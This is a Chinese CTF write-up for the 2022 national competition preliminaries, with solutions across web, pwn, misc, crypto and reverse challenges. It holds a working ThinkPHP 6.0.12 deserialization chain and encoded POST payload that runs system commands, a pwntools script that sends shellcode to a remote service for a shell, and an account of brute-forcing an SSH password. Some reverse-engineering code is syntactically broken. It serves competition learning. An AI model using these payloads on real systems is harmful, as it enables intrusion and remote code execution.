2022国赛初赛干煸豆角wp

type

Post

status

Published

date

May 30, 2022

slug

summary

干煸豆角队wp

Web

online_crt

cmdbrowser

Ezpentest

ezpop

ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

Thinkphp6.0.12LTS 反序列化漏洞分析分享学习。

https://www.freebuf.com/vuls/321546.html

现成链子


<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

访问?s=index/test

post : a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

flag.txt 在根目录下

Pwn

login-normal


# -*- coding: UTF-8 -*-
from pwn import *
from LibcSearcher import *
context.arch = 'amd64'
context.log_level = 'debug'
local_file  = './login'
#libc = ELF('/home/yjc/Desktop/Libc/U16/libc-2.23-32.so')
select = 1

if select == 0:
    p = process(local_file)
    libc = ELF('/glibc/x64/2.23/lib/libc-2.23.so')
    #gdb.attach(p)
else:
    p = remote('59.110.105.63',32241)
    libc = ELF('/home/yjc/Desktop/Libc/U18/libc-2.27-64.so')
    #libc = ELF(remote_libc)
elf = ELF(local_file)

p.recvuntil(">>> ")
# gdb.attach(p)

'''shellcode = 
    push 0x68                
    push 0x732f2f2f
    push 0x6e69622f
    push esp
    pop ebx                    
    push edx           
    push 0x4f
    pop ecx
    push edx
    pop eax
    sub byte ptr[eax + 0x3a] , cl
    sub byte ptr[eax + 0x3a] , cl
    push 0x60       
    pop ecx  
    sub byte ptr[eax + 0x3b] , cl 
    sub byte ptr[eax + 0x3b] , cl
    push 0x40
    pop eax
    xor al,0x40
    push eax
    pop edx
    xor al, 0x40
    xor al, 0x4b    
    push edx
    pop ecx
    push edx
    pop edx
    push edx
    pop edx
    push edx
    pop edx
    push edx
    pop edx
    push edx
    pop edx
'''
shellcode  = 'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'


p.sendline("opt:1\nmsg:ro0tt\n")
# p.sendline("opt:1\n")
p.recvuntil(">>> ")
p.sendline("opt:2\nmsg:" + shellcode + '\n')

p.interactive()

分析出来每次发送必须要有opt和一个msg，先用opt传1，然后msg传入ro0tt，因为最后一位会去掉，所以多加一个t，这样就把$rebase(0x202024)的地方修改为1，然后第二次输入opt:2,然后输入shellcode就行，shellcode需要过滤’\n’,’\t’,等，同时还要可见，输进去就getshell。

Misc

ez_usb

对usb流量包进行分析

tshark -r ez_usb.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > ez_usb.txt


#-*- encoding = utf-8 -*-
f=open('ez_usb.txt','r')
fi=open('output.txt','w')
while 1:
    a=f.readline().strip()
    if a:
        if len(a)==16: 
            out=''
            for i in range(0,len(a),2):
                if i+2 != len(a):
                    out+=a[i]+a[i+1]+":"
                else:
                    out+=a[i]+a[i+1]
            fi.write(out)
            fi.write('\n')
    else:
        break

fi.close()


normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
     "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
      "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
       "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
         "22":"5", "23":"6","24":"7","25":"8","26":"9",
         "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
         "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
         "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
         "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
         "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
         "44":"<F11>","45":"<F12>"}
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
     "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
      "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
       "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
         "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
          "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
          "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
          "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
          "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
          "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
          "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('output.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass

for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass

print ('output :' + "".join(output)

得到压缩包

分析发现是个加密压缩包

526172211a0700Cf907300000d00000000000000c4527424943500300000002A00000002b9f9b0530778b5541d33080020000000666c61672E747874B9Ba013242f3aFC000b092c229d6e994167c05A78708b271fFC042ae3d251e65536F9Ada87c77406b67d0E6316684766a86e844dC81AA2c72c71348d10c43D7B00400700

直接导出密码流失败了，于是导出rar+密码流（wireshark过滤host和2.8.1）相减求出密码

526172211a0700Cf907300000d00000000000000c4527424943500300000002A0000000235b9f9b0530778b5541d3308c50020000000666c61672E747874B9Ba0132357642f3aFC000b092c229d6e994167c055eA78708b271fFC042ae3d251e65536F9Ada5087c77406b67d0E631668476607a86e844dC81AA2c72c714a348d10c43D7B00400700

求出压缩包密码：35c535765e50074a

解压得到flag

everlasting_night

png后面有16个字节,反解md5,得到ohhWh04m1

找了很久的md5反解

用带密码的lsb 解出 https://github.com/livz/cloacked-pixel 得到一个压缩包

密码是f78dcd383f1b574b 解压得到文件

修改后缀名 flag.data

放入GIMP得到flag

Crypto

签到电台


exp:
mimaben_org="6056625155417376265806524810771817861278018532806667458389075368594555947239361591188881261917633075906211469015278797703169250487592076153068195028219452855387768105734781974612620005515008159366009133505290315158625152698682334624143812100290439550905318740826215219174073696492924772426919464050025517581027109618149149276239517963033727222936687528963810198377989562332644080010320634491176419733030755579309399068482495916804890335884402616717300634429243976411609905661228406504206446828623236718794471138745428154944961726"
mimaben="6056 6251 5541 7376 2658 0652 4810" # 密码本

mima   ="1732 2514 1344 0356 0451 6671 0055"  # “弼时安全到达了”所对应的7个电码：
ans   = "7788 8765 6885 7622 2009 6223 4865" # 模10 加

基于挑战码的双向认证 1 和 2

非预期

基于挑战码的双向认证 3

看了看100多人解出来猜到有非预期解尝试cat 发现权限不够，尝试提权，同时对ssh密码进行爆破，结果在我提权出来之前先爆出来了，密码是toor

于是root权限直接cat

Re

baby_tree

SwiftAST,能看的是中间语言，比较长但不是很复杂


for i in range(len(b)-4):
	b[i] = r2 ^ ((k[0] + (r0 >> 4)) & 0xff)
	b[i+1] = r3 ^ (k[1] + (r1 >> 2)) & 0xff)
	b[i+2] = r0 ^ k[2]
	b[i+3] = r1 ^ k[3]
	k[0,1,2,3] = k[1,2,3,0]

逆向出来的代码


b = [88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
k = [121,51,52,53]
while t>=0:
    k[0],k[1],k[2],k[3] = k[3],k[0],k[1],k[2]
    r1 = k[3] ^ b[t+3]
    r0 = k[2] ^ b[t+2)]
    r3 = ((k[1] + (r1 >> 2)) & 0xff) ^ b[t+1]
    r2 = ((k[0] + (r0 >> 4)) & 0xff) ^ b[t+0]
    b[t],b[t+1],b[t+2],b[t+3] = r0,r1,r2,r3
i -= 1
for i in b:
    print(chr(i),end='')